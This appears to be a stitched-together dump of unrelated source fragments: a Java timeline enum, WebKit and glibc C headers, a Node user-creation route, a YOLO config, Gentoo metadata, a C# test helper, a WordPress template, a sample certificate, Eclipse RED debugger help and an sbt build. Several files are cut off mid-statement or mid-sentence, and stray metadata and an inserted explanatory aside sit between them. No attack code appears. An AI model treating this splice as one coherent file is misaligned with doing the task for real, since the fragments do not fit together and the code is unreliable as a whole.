import org.andstatus.app.R;
import org.andstatus.app.lang.SelectableEnum;
import org.andstatus.app.net.social.ApiRoutineEnum;
import org.andstatus.app.notification.NotificationEventType;
import org.andstatus.app.timeline.ListScope;
import org.andstatus.app.util.StringUtil;
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import static org.andstatus.app.net.social.ApiRoutineEnum.ACTOR_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.DUMMY_API;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FOLLOWERS;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FRIENDS;
import static org.andstatus.app.net.social.ApiRoutineEnum.HOME_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.LIKED_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.NOTIFICATIONS_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.PRIVATE_NOTES;
import static org.andstatus.app.net.social.ApiRoutineEnum.PUBLIC_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.SEARCH_NOTES;
public enum TimelineType implements SelectableEnum {
UNKNOWN(ListScope.ORIGIN, "unknown", R.string.timeline_title_unknown, 0, DUMMY_API),
/** The Home timeline and other information (replies...). */
HOME(ListScope.USER, "home", R.string.timeline_title_home, 0, HOME_TIMELINE),
UNREAD_NOTIFICATIONS(ListScope.USER, "unread_notifications", R.string.unread_notifications, 0, NOTIFICATIONS_TIMELINE),
/** The Mentions timeline and other information (replies...). */
INTERACTIONS(ListScope.USER, "interactions", R.string.timeline_title_interactions, 0, NOTIFICATIONS_TIMELINE),
FAVORITES(ListScope.USER, "favorites", R.string.timeline_title_favorites, 0, LIKED_TIMELINE),
    /** Notes by the selected Actor (where he is an Author, or an Actor only (e.g. for Reblog/Retweet)).
     * This Actor is not necessarily one of our Accounts */
SENT(ListScope.USER, "sent", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
SENT_AT_ORIGIN(ListScope.ACTOR_AT_ORIGIN, "sent_at_origin", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
/** Latest notes of every Friend of this Actor
     * (i.e. of every actor followed by this Actor).
* So this is essentially a list of "Friends". See {@link org.andstatus.app.database.table.GroupMembersTable} */
FRIENDS(ListScope.USER, "friends", R.string.friends, R.string.friends_of, GET_FRIENDS),
FOLLOWERS(ListScope.USER, "followers", R.string.followers, R.string.followers_of, GET_FOLLOWERS),
GROUP(ListScope.USER, "group", R.string.group, R.string.group_notes, DUMMY_API),
PUBLIC(ListScope.ORIGIN, "public", R.string.timeline_title_public, 0, PUBLIC_TIMELINE),
EVERYTHING(ListScope.ORIGIN, "everything", R.string.timeline_title_everything, 0, DUMMY_API),
SEARCH(ListScope.ORIGIN, "search", R.string.options_menu_search, 0, SEARCH_NOTES),
PRIVATE(ListScope.USER, "private", R.string.timeline_title_private, 0, PRIVATE_NOTES),
NOTIFICATIONS(ListScope.USER, "notifications", R.string.notifications_title, 0, NOTIFICATIONS_TIMELINE),
DRAFTS(ListScope.USER, "drafts", R.string.timeline_title_drafts, 0, DUMMY_API),
OUTBOX(ListScope.USER, "outbox", R.string.timeline_title_outbox, 0, DUMMY_API),
ACTORS(ListScope.ORIGIN, "users", R.string.user_list, 0, DUMMY_API),
CONVERSATION(ListScope.ORIGIN, "conversation", R.string.label_conversation, 0, DUMMY_API),
COMMANDS_QUEUE(ListScope.ORIGIN, "commands_queue", R.string.commands_in_a_queue, 0, DUMMY_API),
MANAGE_TIMELINES(ListScope.ORIGIN, "manages_timelines", R.string.manage_timelines, 0, DUMMY_API);
/** Code - identifier of the type */
private final String code;
@StringRes
private final int titleResId;
@StringRes
public final int titleResWithParamsId;
/** Api routine to download this timeline */
private final ApiRoutineEnum connectionApiRoutine;
public final ListScope scope;
TimelineType(ListScope scope, String code, @StringRes int resId, @StringRes int resWithParamsId,
ApiRoutineEnum connectionApiRoutine) {
this.scope = scope;
this.code = code;
this.titleResId = resId;
this.titleResWithParamsId = resWithParamsId;
this.connectionApiRoutine = connectionApiRoutine;
}
/** Returns the enum or UNKNOWN */
@NonNull
public static TimelineType load(String strCode) {
for (TimelineType value : TimelineType.values()) {
if (value.code.equals(strCode)) {
return value;
}
}
return UNKNOWN;
}
public static List<TimelineType> getDefaultMyAccountTimelineTypes() {
return defaultMyAccountTimelineTypes;
}
public static Set<TimelineType> getDefaultOriginTimelineTypes() {
return defaultOriginTimelineTypes;
}
@NonNull
public static TimelineType from(NotificationEventType event) {
switch (event) {
case OUTBOX:
return OUTBOX;
default:
return UNREAD_NOTIFICATIONS;
}
}
/** String to be used for persistence */
public String save() {
return code;
}
@Override
public String toString() {
return "timelineType:" + code;
}
@Override
public String getCode() {
return code;
}
/** Localized title for UI */
@Override
public CharSequence title(Context context) {
if (titleResId == 0 || context == null) {
return this.code;
} else {
return context.getText(titleResId);
}
}
public CharSequence title(Context context, Object ... params
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright (C) 2014, 2015 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef ComplexGetStatus_h
#define ComplexGetStatus_h
#include "JSCJSValue.h"
#include "ObjectPropertyConditionSet.h"
#include "PropertyOffset.h"
namespace JSC {
class CodeBlock;
class StructureChain;
// This class is useful for figuring out how to inline a cached get-like access. We
// say "get-like" because this is appropriate for loading the GetterSetter object in
// a put_by_id that hits a setter. Notably, this doesn't figure out how to call
// accessors, or even whether they should be called. What it gives us, is a way of
// determining how to load the value from the requested property (identified by a
// StringImpl* uid) from an object of the given structure in the given CodeBlock,
// assuming that such an access had already been cached by Repatch (and so Repatch had
// already done a bunch of safety checks). This doesn't reexecute any checks that
// Repatch would have executed, and for prototype chain accesses, it doesn't ask the
// objects in the prototype chain whether their getOwnPropertySlot would attempt to
// intercept the access - so this really is only appropriate if you already know that
// one of the JITOperations had OK'd this for caching and that Repatch concurred.
//
// The typical use pattern is something like:
//
// ComplexGetStatus status = ComplexGetStatus::computeFor(...);
// switch (status.kind()) {
// case ComplexGetStatus::ShouldSkip:
// // Handle the case where this kind of access is possibly safe but wouldn't
// // pass the required safety checks. For example, if an IC gives us a list of
// // accesses and one of them is ShouldSkip, then we should pretend as if it
// // wasn't even there.
// break;
// case ComplexGetStatus::TakesSlowPath:
//     // This kind of access is not safe to inline. Bail out of any attempts to
// // inline.
// break;
// case ComplexGetStatus::Inlineable:
// // The good stuff goes here. If it's Inlineable then the other properties of
// // the 'status' object will tell you everything you need to know about how
// // to execute the get-like operation.
// break;
// }
class ComplexGetStatus {
public:
enum Kind {
ShouldSkip,
TakesSlowPath,
Inlineable
};
ComplexGetStatus()
: m_kind(ShouldSkip)
, m_offset(invalidOffset)
{
}
static ComplexGetStatus skip()
{
return ComplexGetStatus();
}
static ComplexGetStatus takesSlowPath()
{
ComplexGetStatus result;
result.m_kind = TakesSlowPath;
return result;
}
static ComplexGetStatus computeFor(
Structure* headStructure, const ObjectPropertyConditionSet&, UniquedStringImpl* uid);
Kind kind() const { return m_kind; }
PropertyOffset offset() const { return m_offset; }
const ObjectPropertyConditionSet& conditionSet() const { return m_conditionSet; }
private:
Kind m_kind;
PropertyOffset m_offset;
ObjectPropertyConditionSet m_conditionSet;
};
} // namespace JSC
#endif // ComplexGetStatus_h
/* Copyright (C) 1991, 1992, 1993, 1996, 1997, 1998, 1999, 2001, 2002, 2003,
2005, 2007, 2009, 2010 Free Software Foundation, Inc.
This file is part of the GNU C Library.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */
#ifndef _FNMATCH_H
#define _FNMATCH_H 1
#define _GL_ARG_NONNULL( x ) /**/
#ifdef __cplusplus
extern "C" {
#endif
/* We #undef these before defining them because some losing systems
(HP-UX A.08.07 for example) define these in <unistd.h>. */
#undef FNM_PATHNAME
#undef FNM_NOESCAPE
#undef FNM_PERIOD
/* Bits set in the FLAGS argument to `fnmatch'. */
#define FNM_PATHNAME (1 << 0) /* No wildcard can ever match `/'. */
#define FNM_NOESCAPE (1 << 1) /* Backslashes don't quote special chars. */
#define FNM_PERIOD (1 << 2) /* Leading `.' is matched only explicitly. */
#if !defined _POSIX_C_SOURCE || _POSIX_C_SOURCE < 2 || defined _GNU_SOURCE
# define FNM_FILE_NAME FNM_PATHNAME /* Preferred GNU name. */
# define FNM_LEADING_DIR (1 << 3) /* Ignore `/...' after a match. */
# define FNM_CASEFOLD (1 << 4) /* Compare without regard to case. */
# define FNM_EXTMATCH (1 << 5) /* Use ksh-like extended matching. */
#endif
/* Value returned by `fnmatch' if STRING does not match PATTERN. */
#define FNM_NOMATCH 1
/* This value is returned if the implementation does not support
`fnmatch'. Since this is not the case here it will never be
returned but the conformance test suites still require the symbol
to be defined. */
#ifdef _XOPEN_SOURCE
# define FNM_NOSYS (-1)
#endif
/* Match NAME against the file name pattern PATTERN,
returning zero if it matches, FNM_NOMATCH if not. */
extern int fnmatch (const char *__pattern, const char *__name,
int __flags)
_GL_ARG_NONNULL ((1, 2));
#ifdef __cplusplus
}
#endif
#endif /* fnmatch.h */
module.exports = {
urls: ['/add'],
routers: {
get: function (req, res) {
var username = "username" + new Date().getTime();
var password = "password" + new Date().getTime();
var User = req.models.User;
User.create({
username: username,
password: password
}).then(function(created) {
res.send(created);
});
}
}
};
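This module only exports a `{ urls, routers }` description; the framework that consumes it is not shown in this file. A plausible registration loop (hypothetical — the real loader may differ) would pair each URL with each HTTP-method handler:

```javascript
// Hypothetical consumer of a { urls, routers } route module.
// The route object below mimics the shape exported above.
const route = {
  urls: ['/add'],
  routers: {
    get: function (req, res) { res.send('created'); }
  }
};

function register(route) {
  // Collect "METHOD url" pairs the way an Express-style loader might
  // call app[method](url, handler) for each combination.
  const pairs = [];
  for (const url of route.urls) {
    for (const method of Object.keys(route.routers)) {
      pairs.push(method.toUpperCase() + ' ' + url);
    }
  }
  return pairs;
}

console.log(register(route)); // [ 'GET /add' ]
```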
[net]
# Testing
batch=1
subdivisions=1
# Training
# batch=64
# subdivisions=8
width=224
height=224
channels=3
momentum=0.9
decay=0.0005
angle=0
saturation = 1.5
exposure = 1.5
hue=.1
learning_rate=0.001
burn_in=1000
max_batches = 500200
policy=steps
steps=400000,450000
scales=.1,.1
[convolutional]
batch_normalize=1
filters=32
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=64
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=64
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
#######
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[route]
layers=-9
[convolutional]
batch_normalize=1
size=1
stride=1
pad=1
filters=64
activation=leaky
[reorg]
stride=2
[route]
layers=-1,-4
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
size=1
stride=1
pad=1
filters=425
activation=linear
[region]
anchors = 0.57273, 0.677385, 1.87446, 2.06253, 3.33843, 5.47434, 7.88282, 3.52778, 9.77052, 9.16828
bias_match=1
classes=80
coords=4
num=5
softmax=1
jitter=.3
rescore=1
object_scale=5
noobject_scale=1
class_scale=1
coord_scale=1
absolute=1
thresh = .6
random=1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="project">
<email>haskell@gentoo.org</email>
<name>Gentoo Haskell</name>
</maintainer>
<longdescription>
A new all Haskell "tagged" DFA regex engine, inspired by libtre
</longdescription>
</pkgmetadata>
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in the project root for license information.
using System;
using System.Collections;
using System.Collections.Generic;
using FluentAssertions.Equivalency;
using Microsoft.R.ExecutionTracing;
using Microsoft.R.StackTracing;
using NSubstitute;
namespace Microsoft.R.Host.Client.Test {
internal class TracebackBuilder : IReadOnlyList<IRStackFrame> {
public struct AnyType {
public static implicit operator string (AnyType any) => "<ANY>";
public static implicit operator int (AnyType any) => -1;
}
public static readonly AnyType Any = default(AnyType);
private readonly List<IRStackFrame> _frames = new List<IRStackFrame>();
private Func<EquivalencyAssertionOptions<IRStackFrame[]>, EquivalencyAssertionOptions<IRStackFrame[]>> _config = options => options;
public int Count {
get {
return _frames.Count;
}
}
public IRStackFrame this[int index] {
get {
return _frames[index];
}
}
public IEnumerator<IRStackFrame> GetEnumerator() {
return _frames.GetEnumerator();
}
IEnumerator IEnumerable.GetEnumerator() {
return _frames.GetEnumerator();
}
public EquivalencyAssertionOptions<IRStackFrame[]> Configure(EquivalencyAssertionOptions<IRStackFrame[]> options) {
return _config(options);
}
public void Add(string fileName, int? lineNumber, string call, string environmentName) {
string itemPath = "[" + _frames.Count + "].";
var frame = Substitute.For<IRStackFrame>();
if (fileName != Any) {
frame.FileName.Returns(fileName);
}
if (lineNumber != Any) {
frame.LineNumber.Returns(lineNumber);
}
if (call != Any) {
frame.Call.Returns(call);
}
if (environmentName != Any) {
frame.EnvironmentName.Returns(environmentName);
}
_frames.Add(frame);
var oldConfig = _config;
_config = options => {
options = oldConfig(options);
if (fileName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.FileName));
}
if (lineNumber != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.LineNumber));
}
if (call != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.Call));
}
if (environmentName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.EnvironmentName));
}
return options;
};
}
public void Add(string fileName, int lineNumber, string call) {
Add(fileName, lineNumber, call, Any);
}
public void Add(string fileName, int lineNumber) {
Add(fileName, lineNumber, Any);
}
public void Add(SourceFile sourceFile, int lineNumber, string call, string environmentName) {
Add(sourceFile.FilePath, lineNumber, call, environmentName);
}
public void Add(SourceFile sourceFile, int lineNumber, string call) {
Add(sourceFile.FilePath, lineNumber, call);
}
public void Add(SourceFile sourceFile, int lineNumber) {
Add(sourceFile.FilePath, lineNumber);
}
public void Add(RSourceLocation location, int offset, string call) {
Add(location.FileName, location.LineNumber + offset, call);
}
public void Add(RSourceLocation location, int offset = 0) {
Add(location.FileName, location.LineNumber + offset, Any);
}
public void Add(RSourceLocation location, string call) {
Add(location.FileName, location.LineNumber, call);
}
}
}
<?php
/*
Template Name: Page No Title
*/
get_header(); ?>
<?php
if( have_posts() ):
while( have_posts() ): the_post(); ?>
<h1>This is my Static Title</h1>
<small>Posted on: <?php the_time('F j, Y'); ?> at <?php the_time('g:i a'); ?>, in <?php the_category(); ?></small>
<p><?php the_content(); ?></p>
<hr>
<?php endwhile;
endif;
?>
<?php get_footer(); ?>
-----BEGIN CERTIFICATE-----
MIICQzCCAemgAwIBAgIQadOYD65Y3ytwRxqobjm2OTAKBggqhkjOPQQDAjBzMQsw
CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNU2FuIEZy
YW5jaXNjbzEZMBcGA1UEChMQb3JnNS5leGFtcGxlLmNvbTEcMBoGA1UEAxMTY2Eu
b3JnNS5leGFtcGxlLmNvbTAeFw0xODA0MTcwMTI2NDFaFw0yODA0MTQwMTI2NDFa
MHMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1T
YW4gRnJhbmNpc2NvMRkwFwYDVQQKExBvcmc1LmV4YW1wbGUuY29tMRwwGgYDVQQD
ExNjYS5vcmc1LmV4YW1wbGUuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE
UPoXa8KJUqd4FXX6RvUsoKVdZHK1fQztQKhCyMOwFAVwhsGGEGp0Dw+vLbU7iE3R
bjjy0v9Wi9JoKh3ViSkMH6NfMF0wDgYDVR0PAQH/BAQDAgGmMA8GA1UdJQQIMAYG
BFUdJQAwDwYDVR0TAQH/BAUwAwEB/zApBgNVHQ4EIgQgPrnZYjpqEW5QkPNtCBin
uuk0WGD3EaqkfnkgZpBfyvQwCgYIKoZIzj0EAwIDSAAwRQIhAPVAZs87tHhDlreT
0iOmPJgv5XJ6s85uK59jHARu0YlvAiBlGksg8HkuJVK4GDCSPTFEINH4FgD8h3dO
Z11etT6MDw==
-----END CERTIFICATE-----
<html>
<head>
<link href="PLUGINS_ROOT/org.robotframework.ide.eclipse.main.plugin.doc.user/help/style.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<a href="RED/../../../../../help/index.html">RED - Robot Editor User Guide</a> > <a href="RED/../../../../../help/user_guide/user_guide.html">User guide</a> > <a href="RED/../../../../../help/user_guide/launching.html">Launching Tests</a> > <a href="RED/../../../../../help/user_guide/launching/debug.html">Debugging Robot</a> >
<h2>Hitting a breakpoint during debug execution</h2>
<p>Whenever the debugger suspends the execution, a lot of useful information is presented to the user, and new
opportunities to influence the running tests appear. First of all, the toolbar buttons get activated:
</p>
<img src="images/debug_toolbar.png"/>
<p>moving from left to right:</p>
<ul>
<li><b>Skip All Breakpoints</b> - allows execution to continue without stopping on defined breakpoints
(globally disabling all the breakpoints)
</li>
<li><b>Resume</b> - <kbd>F8</kbd> described in <a href="../exec_control.html">Controlling execution</a></li>
<li><b>Suspend</b> - as above</li>
<li><b>Terminate</b> - <kbd>Ctrl</kbd>+<kbd>F2</kbd> as above</li>
<li><b>Disconnect</b> - as above</li>
<li><b>Step Into</b> - <kbd>F5</kbd> - each <kbd>F5</kbd> key press will execute the active line and move to the next
    one. If the active line contains a Keyword or an embedded TestCase, the test executor will jump into the item and execute
    it line by line. To exit from executing inherited items use Step Return (<kbd>F7</kbd>)</li>
<li><b>Step Over</b> - <kbd>F6</kbd> - each <kbd>F6</kbd> key press will execute the active line and move to the next
    one. If a keyword exists in the current line, the keyword result will be returned without going into the Keyword content</li>
<li><b>Step Return</b> - <kbd>F7</kbd> - allows returning to the main TestCase execution from an embedded TestCase
    or Keyword if Step Into was used before</li>
</ul>
<h3>Debug view</h3>
<p>When execution is suspended the <b>Debug</b> view shows all the frames on the current path in the execution tree.
The bottom part of this path directly corresponds to the tree which can be seen in the <b>Execution</b> view as
depicted below:
</p>
<img src="images/debug_debug_view.png"/><br/>
<img src="images/debug_execution_view.png"/>
<p>The bottom frame corresponds to <code>Project</code> suite (this is a directory in file system, so there is a
little directory decoration visible). Next frame corresponds to <code>Calculations</code> suite (which is a
<code>calculations.robot</code> file) and the frame above it represents <code>Divisions</code> test inside that
suite. Next frames do not correspond to any node inside the execution tree visible in <b>Execution</b> view. It
can be read that stopped execution is currently inside <code>Divisions</code> test at instruction in line
<code>35</code>, which called a keyword <code>Divide</code> which then called another keyword
<code>BinaryDivision</code> from line <code>57</code> which finally called library keyword <code>Evaluate</code>
coming from <code>BuiltIn</code> library at line <code>61</code>.
</p>
<p>Additionally you may see that there is a single execution thread (RF executes tests in a single thread); the
execution is suspended and the agent is communicating with RED using localhost at port <code>59344</code>.
</p>
<h3 id="debug_shell_view">Debug Shell view</h3>
<p>Whenever execution is suspended and a frame inside <b>Debug</b> view is selected then it is possible to use
<b>Debug Shell</b> view in order to evaluate different expressions. The view is not opened in <b>Debug</b>
perspective by default and needs to be opened using <a class="command" href="javascript:executeCommand('org.eclipse.ui.views.showView(org.eclipse.ui.views.showView.viewId=org.robotframework.ide.DebugShell)')">
Window -> Show View -> Other... -> Robot -> Debug Shell</a>.
</p>
<img src="images/debug_shell.png"/>
<p>The view allows evaluating expressions in 3 modes:
</p>
<ul>
<li><b>ROBOT</b> in which <b>keyword</b> calls can be executed; under the hood it uses <code>BuiltIn.Run Keyword</code>
keyword from standard library,
</li>
<li><b>VARIABLE</b> in which variable-like expressions can be evaluated,
</li>
<li><b>PYTHON</b> which allows to evaluate Python expressions; under the hood the expression is passed to
<code>BuiltIn.Evaluate</code> keyword which effectively calls Python <code>eval()</code>.
</li>
</ul>
<p>Switching between modes is done using view buttons or through the <kbd>Ctrl + T</kbd> shortcut. The view
remembers the last 5 executed expressions so it is possible to switch between them using up/down arrows.
In <b>ROBOT</b> and <b>PYTHON</b> mode it is possible to continue expression in multiple lines using
<kbd>Shift+Enter</kbd> keys.
</p>
<h3>Variables view</h3>
<p>Whenever you select a frame inside the <b>Debug</b> view, the Robot variables defined inside it are shown in the
<b>Variables</b> view. This view handles scalar, list and dictionary variables. The scalar variable only shows
its value, while the other two types also show their contents. Depending on the type of
variable, the icon has a different color assigned, as visible on the image below:
</p>
<img src="images/debug_variables.png"/>
<p>As you can see some of the variables are displayed under the <b>Automatic Variables</b> node. This is a place
where all the variables which are built into Robot are gathered together (refer to <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#built-in-variables" target="_blank">
RF User Guide</a>). All the user variables are displayed on top-level.
</p>
<p>Variable scope (see <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#variable-scopes" target="_blank">
User Guide</a> on this topic) is reflected in this view using icon decoration: <b>G</b>, <b>S</b>, <b>T</b> or <b>L</b>
is placed on variable icon for <b>Global</b>, <b>Suite</b>, <b>Test</b>, <b>Local</b> scopes. You may find out
that global-scoped variables are visible for every single stack frame, suite-scoped variables are only visible
in a suite frame and frames below, test-scoped variables only in test frame and below while local-scoped variables
only in current frame. Of course for example <code>${SUITE_NAME}</code> automatic variable (which has suite scope)
may be visible for all suite frames, however it may have different values as the suites are nested.
</p>
<p>For both dictionaries and lists the actual type of the Python object is written in the <b>Value</b> column. On the picture above
<b>DotDict[3]</b> for the <code>&{dictionary}</code> variable means that in Python this object has type <b>DotDict</b>,
the rest mean
import Common._
import Unfiltered._
import Dependencies._
import ReleaseTransformations._
Common.settings
enablePlugins(ScalaUnidocPlugin)
// unidoc publish settings
name := "unfiltered-all"
artifacts := Classpaths.artifactDefs(Seq(packageDoc in Compile)).value
packagedArtifacts := Classpaths.packaged(Seq(packageDoc in Compile)).value
Defaults.packageTaskSettings(
packageDoc in Compile, (unidoc in Compile).map{_.flatMap(Path.allSubpaths)}
)
releaseCrossBuild := true
releaseProcess := Seq[ReleaseStep](
checkSnapshotDependencies,
inquireVersions,
runClean,
runTest,
setReleaseVersion,
commitReleaseVersion,
tagRelease,
releaseStepCommandAndRemaining("+publishSigned"),
releaseStepCommandAndRemaining("sonatypeBundleRelease"),
setNextVersion,
commitNextVersion,
pushChanges,
)
val specs2ProjectId = "specs2"
val scalatestProjectId = "scalatest"
val filterProjectId = "filter"
// avoid cyclic error
def dependsOnInTest(id: String) =
unmanagedClasspath in Test ++= (fullClasspath in (local(id), Compile)).value
val dependsOnSpecs2InTest = dependsOnInTest(specs2ProjectId)
lazy val library: Project = module("unfiltered")(
dirName = "library",
projectId = "unfiltered"
).settings(
description := "Core library for describing requests and responses",
dependsOnSpecs2InTest,
dependsOnInTest(scalatestProjectId),
dependsOnInTest(filterProjectId),
libraryDependencies ++= Seq(
"commons-codec" % "commons-codec" % commonsCodecVersion,
specs2Dep.value % "test",
"org.scalatest" %% "scalatest" % scalatestVersion % "test",
"org.scalatestplus" %% "scalacheck-1-14" % scalatestScalacheckVersion % "test",
),
libraryDependencies ++= {
CrossVersion.partialVersion(scalaVersion.value) match {
case Some((2, v)) if v >= 11 =>
Seq("org.scala-lang.modules" %% "scala-xml" % scalaXmlVersion)
case _ =>
Nil
}
}
).dependsOn(util)
lazy val directives = module("directives")().settings(
description := "monadic api for unfiltered"
).dependsOn(library, specs2 % "test")
lazy val filters = module(filterProjectId)().settings(
description := "Server binding for Java Servlet filters",
libraryDependencies += servletApiDep,
dependsOnSpecs2InTest
).dependsOn(library)
lazy val filtersAsync = module("filter-async")().settings(
description := "Server binding for Java Servlet 3.0 async filters",
libraryDependencies += servletApiDep
).dependsOn(filters, specs2 % "test")
lazy val agents = module("agents")(
srcPath = "unfiltered/request"
).settings(
description := "User-Agent request matchers",
libraryDependencies += "org.scalatest" %% "scalatest" % scalatestVersion % "test",
libraryDependencies ++= Seq(servletApiDep) ++ integrationTestDeps.value
).dependsOn(
library,
scalatest % "test",
filters % "test"
)
lazy val uploads = module("uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Generic support for multi-part uploads",
libraryDependencies ++= Seq(
"commons-io" % "commons-io" % commonsIoVersion
) ++ integrationTestDeps.value
).dependsOn(library, specs2 % "test")
lazy val filterUploads = module("filter-uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Support for multi-part uploads for servlet filters",
libraryDependencies ++= Seq(
servletApiDep,
"commons-fileupload" % "commons-fileupload" % commonsFileUploadVersion
) ++ integrationTestDeps.value
).dependsOn(uploads, filters, specs2 % "test")
lazy val util = module("util")().settings(
libraryDependencies += specs2Dep.value % "test"
)
lazy val jetty = module("jetty")().settings(
description := "Jetty server embedding module",
libraryDependencies := Seq(
"org.eclipse.jetty" % "jetty-webapp" % jettyVersion
)
).dependsOn(util)
lazy val nettyServer = module("netty-server")(
srcPath = "unfiltered/netty"
).settings(
description := "Netty server embedding module",
dependsOnSpecs2InTest,
libraryDependencies += "javax.activation" % "activation" % javaxActivationVersion,
libraryDependencies ++= integrationTestDeps.value
).dependsOn(netty, util)
lazy val netty = module("netty")().settings(
description := "Netty server binding module",
dependsOnSpecs2InTest,
libraryDependencies ++= {
("io.netty" % "netty-codec-http" % nettyVersion) +:
("io.netty" % "netty-handler" % nettyVersion) +:
("io.netty" % "netty-transport-native-epoll" % nettyVersion classifier "linux-x86_64") +:
("io.netty" % "netty-transport-native-kqueue" % nettyVersion classifier "osx-x86_64") +:
integrationTestDeps.value
}
).dependsOn(library)
lazy val specs2: Project = module(specs2ProjectId)().settings(
description := "Facilitates testing Unfiltered servers with Specs2",
libraryDependencies ++= {
specs2Dep.value :: okHttp
}
).dependsOn(filters, jetty, nettyServer)
lazy val scalatest = module(scalatestProjectId)().settings(
description := "Facilitates testing Unfiltered servers with ScalaTest",
libraryDependencies ++= {
okHttp :+
("org.scalatest" %% "scalatest-core" % scalatestVersion)
}
).dependsOn(filters, jetty, nettyServer)
lazy val json4s = module("json4s")(
srcPath = "unfiltered"
).settings(
description := "Json4s request matchers and response functions",
libraryDependencies ++= {
Seq("org.json4s" %% "json4s-native" % json4sVersion) ++ integrationTestDeps.value
}
).dependsOn(library, filters % "test", specs2 % "test")
lazy val websockets = module("netty-websockets")().settings(
description := "WebSockets plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
libraryDependencies += "com.ning" % "async-http-client" % asyncHttpClientVersion % "test"
